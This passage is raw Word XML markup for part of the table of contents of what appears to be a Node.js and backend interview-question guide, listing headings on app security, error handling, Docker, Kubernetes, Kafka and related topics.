            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B85D350" w14:textId="6AEED5A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41" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What are some best practices that must be implemented to secure the application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149</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3808920F" w14:textId="7D296FC8"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42" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is rate limiting and helmet package for securing header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149</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BD815CD" w14:textId="0797CD39"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343" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Error Handling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152</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BC936D5" w14:textId="2F8BF4E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44" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is error handling in Node.js and why is it important?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152</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21496FA9" w14:textId="63AFA71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45" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you handle errors in asynchronous code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153</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194D57A0" w14:textId="5D30292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46" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the difference between operational errors and programmer errors?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155</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47275590" w14:textId="492A4F8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47" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How does the try...catch block work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155</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B0A573E" w14:textId="4B23AE9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48" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the role of the process object in error handling?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155</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66C1CEDF" w14:textId="6259B6DA"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49" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How can you handle uncaught exceptions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_Toc178383349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156</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="342A29B0" w14:textId="067D679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50" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the use of Promise and async/await in error handling.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158</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="508E1543" w14:textId="7E6E855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51" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Error Handling with </w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>async/await</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w: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158</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75D27A63" w14:textId="7D595EB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52" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you handle errors in callback functions?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158</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="26AE1A02" w14:textId="6A30ADF8"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53" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is a global error handler and how do you implement one in Node.js?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159</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="002883E4" w14:textId="5A4164B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54" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you manage error logging in a Node.js application?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160</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D58680B" w14:textId="2C2221B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55" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>How do you handle errors in Express.js middleware?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162</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="339C39E7" w14:textId="2B6061A8"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56" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>What is the error-first callback pattern?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163</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B6614DC" w14:textId="12EA8FE1"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357" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Good to have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164</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="663AE967" w14:textId="2FD4485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58" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Briefly explain the purpose and benefits of using Kubernetes in container orchestration.</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164</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D18F812" w14:textId="7A23F94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59" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Describe the CI/CD pipeline and its role in automating the software development lifecycle.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_Toc178383359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164</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41F1BAB5" w14:textId="7AE6967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60" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain how Docker containers provide isolation and portability for backend applications.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165</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="71948871" w14:textId="3ECB968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61" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Differentiate between RESTful APIs and GraphQL and discuss potential use cases for GraphQL.</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166</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A435D52" w14:textId="06C5DF3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62" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Describe the role of Kafka as a distributed streaming platform.</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166</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="355FFFD0" w14:textId="4DC9C2F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63" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Explain the components of the ELK Stack (Elasticsearch, Logstash, Kibana) and its use for log management and analytics.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167</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3EE58D0E" w14:textId="462F5E9E"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64" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discuss how message queues facilitate asynchronous communication between backend services.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167</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0761184C" w14:textId="26B83A7A"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365" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Docker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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32EDD6A7" w14:textId="751CBCF8"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66" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1. What is Docker, and why is it used?</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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6950A39A" w14:textId="24D43E4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67" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2. How is a Docker container different from a virtual machine?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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55A12A1A" w14:textId="48094E4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68" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>3. What is a Dockerfile, and what are its key instructions?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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22D91B83" w14:textId="5C62D8B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69" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4. How do you build and run a Docker image?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_Toc178383369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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E0131ED" w14:textId="309B018B"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0" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5. Explain the difference between CMD and ENTRYPOINT in a Dockerfile.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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EE539ED" w14:textId="77A1F35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1" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6. What is Docker Compose, and how does it work?</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169</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AEBF113" w14:textId="5CAB7FF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2" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7. What is a Docker Volume, and how do you use it?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170</w:t>
            </w:r>
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="188C0D51" w14:textId="0AB1BEE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3" w:history="1">
            <w:r w:rsidR="00593FEF" w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8. How do you monitor and troubleshoot Docker containers?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170</w:t>
            </w:r>
